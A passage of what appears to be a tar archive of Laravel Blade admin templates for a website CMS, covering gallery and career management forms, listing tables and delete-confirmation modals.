asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/gallery/create.blade.php����������������������������������������������������������������0000644�����������������00000006326�14765366572�0013506 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_gallery') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/gallery-style1.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('gallery.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 420 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input id="title" name="title" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="subtitle">{{ __('content.subtitle') }}</label> <input id="subtitle" name="subtitle" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/gallery/index.blade.php�����������������������������������������������������������������0000644�����������������00000054514�14765366572�0013354 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.gallery') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/gallery-style1.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#galleryImageSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ route('gallery.create') }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_gallery') }}</a> </div> </div> @if (count($items) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('gallery.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.image') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.subtitle') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> @if (!empty($item->section_image)) <img class="image-size img-fluid" src="{{ asset('uploads/img/gallery/'.$item->section_image) }}" alt="blog image"> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $item->title }}</td> <td>{{ $item->subtitle }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('gallery.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('gallery.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="galleryImageSectionModal" tabindex="-1" role="dialog" aria-labelledby="galleryImageSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="galleryImageSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('gallery-section.update', $item_section->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item_section->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }} <span class="text-red">*</span></label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $item_section->section_item }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }} <span class="text-red">*</span></label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $item_section->paginate_item }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#galleryImageSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> Reset </a> </form> <!-- Modal --> <div class="modal fade" id="galleryImageSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="serviceSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="galleryImageSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('gallery-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('gallery-section.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }} <span class="text-red">*</span></label> <input type="number" name="section_item" class="form-control" id="section_item" value="3" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }} <span class="text-red">*</span></label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="6" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/gallery/edit.blade.php������������������������������������������������������������������0000644�����������������00000017117�14765366572�0013170 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_gallery') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/gallery-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('gallery.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 420 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/gallery/'.$item->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="subtitle">{{ __('content.subtitle') }} </label> <input type="text" name="subtitle" class="form-control" id="subtitle" value="{{ $item->subtitle }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('gallery.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/create.blade.php�����������������������������������������������������������������0000644�����������������00000021331�14765366572�0013301 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_career') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/career-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} <span class="text-red">*</span></label> <input id="title" name="title" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="short_description">{{ __('content.short_description') }}</label> <textarea id="short_description" name="short_description" class="form-control" rows="3"></textarea> </div> </div> <div class="col-md-12"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" name="type" id="optionsRadios1" onclick="showHideTypeDiv()" value="icon" checked=""><span class="ml-3">{{ __('content.icon') }}</span> <i class="input-helper"></i> </label> </div> <div class="form-check pl-0"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-1" name="type" id="optionsRadios2" onclick="showHideTypeDiv()" value="image"><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i></label> </div> </fieldset> <div class="form-group" id="icon-type"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="display: none;"> <div class="form-group" > <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64 (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/career/content/create.blade.php���������������������������������������������������������0000644�����������������00000065405�14765366572�0014765 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.career_content') }}</h4> @if (isset($career_content)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-content.update', $career_content->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="career_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') }}</label> <textarea type="text" name="description" class="form-control" id="summernote">@php echo html_entity_decode($career_content->description); @endphp</textarea> </div> </div> <div class="col-md-12 box-margin"> <div id="accordion-"> <div class="card mb-2"> <div class="card-header bg-secondary"> <a class="collapsed text-white" data-toggle="collapse" href="#accordion-1" aria-expanded="false"> {{ __('content.seo_optimization') }} </a> </div> <div id="accordion-1" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="meta_description">{{ __('content.meta_description') }} </label> <input id="meta_description" name="meta_description" type="text" class="form-control" value="{{ $career_content->meta_description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="meta_keyword">{{ __('content.meta_keyword') }} ({{ __('content.separate_with_commas') }})</label> <textarea id="meta_keyword" name="meta_keyword" class="form-control">{{ $career_content->meta_keyword }}</textarea> </div> </div> </div> </div> </div> </div> <div class="card"> <div class="card-header bg-secondary"> <a class="text-white" data-toggle="collapse" href="#accordion-2" aria-expanded="true"> {{ __('content.breadcrumb_customization') }} </a> </div> <div id="accordion-2" class="collapse" data-parent="#accordion-" style=""> <div class="card-body"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="breadcrumb_status" class="col-form-label">{{ __('content.please_use_recommended_sizes') }}</label> <select name="breadcrumb_status" class="form-control" id="breadcrumb_status"> <option value="no" selected>{{ __('content.select_your_option') }}</option> <option value="yes" {{ $career_content->breadcrumb_status == 'yes' ? 'selected' : '' }}>{{ __('content.yes') }}</option> <option value="no" {{ $career_content->breadcrumb_status == 'no' ? 'selected' : '' }}>{{ __('content.no') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="custom_breadcrumb_image">{{ __('content.custom_breadcrumb_image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="custom_breadcrumb_image" class="form-control-file" id="custom_breadcrumb_image"> <small id="custom_breadcrumb_image" class="form-text text-muted">{{ __('content.recommended_size') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($career_content->custom_breadcrumb_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/career/breadcrumb/'.$career_content->custom_breadcrumb_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="col-md-4"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($career_content->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/career/'.$career_content->section_image) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($career_content->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $career_content->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#careerContentDestroyModal{{ $career_content->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $career_content->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('career-content.destroy_image', $career_content->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="careerContentDestroyModal{{ $career_content->id }}" tabindex="-1" role="dialog" aria-labelledby="careerContentDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="careerContentDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('career-content.destroy', $career_content->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('career-content.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="career_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-8"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="summernote">{{ __('content.description') 